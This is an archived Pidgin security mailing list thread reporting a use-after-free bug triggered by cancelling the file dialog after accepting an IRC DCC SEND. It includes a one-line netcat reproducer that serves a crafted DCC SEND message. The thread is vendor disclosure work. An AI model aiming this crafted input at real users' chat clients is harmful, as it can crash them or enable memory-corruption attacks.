Pidgin uaf when cancelling file select dialog after accepting DCC SEND

Joseph Bisch joseph.bisch at gmail.com
Wed Sep 20 22:25:10 EDT 2017


Sorry, yes. That's what I mean.

On Wed, Sep 20, 2017 at 10:20 PM, Eion Robb <eion at robbmob.com> wrote:
> Sorry, just to check, UAF meaning "use after free"?
>
> On 21 September 2017 at 14:05, Joseph Bisch <joseph.bisch at gmail.com> wrote:
>>
>> Hi,
>>
>> Here is the reproducer:
>>
>> echo $':c PRIVMSG a :\x01DCC SEND a a a a\x01\r\n' | nc -l -p 6667
>>
>> Then you must accept the dcc send and cancel out of the file select
>> dialog. If you either click save on the file select dialog or you do
>> not accept the dcc send, then the uaf does not happen.
>>
>> Joseph
>>
>> _______________________________________________
>> security mailing list
>> security at pidgin.im
>> https://pidgin.im/cgi-bin/mailman/listinfo/security
>
>


More information about the security mailing list